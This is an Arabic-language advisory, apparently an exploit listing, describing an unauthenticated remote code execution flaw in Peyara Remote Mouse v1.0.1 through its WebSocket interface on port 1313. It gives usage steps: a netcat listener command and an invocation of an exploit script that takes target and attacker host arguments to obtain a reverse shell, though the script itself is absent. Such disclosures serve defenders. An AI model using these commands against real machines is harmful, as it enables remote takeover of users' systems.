
Peyara الماوس عن بُعد v1.0.1- تنفيذ التعليمات البرمجية عن بُعد (RCE)
يحتوي Peyara Remote Mouse v1.0.1 على ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في واجهة أوامر WebSocket (المنفذ 1313). يفشل التطبيق في التحقق من صحة أو تنقية أوامر إدخال لوحة المفاتيح المحاكاة المستلمة عبر اتصالات WebSocket، مما يسمح للمهاجمين بتسلسل أحداث لوحة مفاتيح ضارة تنفذ أوامر نظام عشوائية. يمكن استغلال هذه الثغرة عن بُعد دون مصادقة لتحقيق اختراق كامل للنظام.
تثبيت التطبيق الضعيف
قم بتنزيل وتثبيت Peyara Remote Mouse على نظام Windows الهدف.
بدء مستمع Netcat
افتح طرفية ونفّذ:
nc -nlvp 4444
تنفيذ سكربت الاستغلال
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

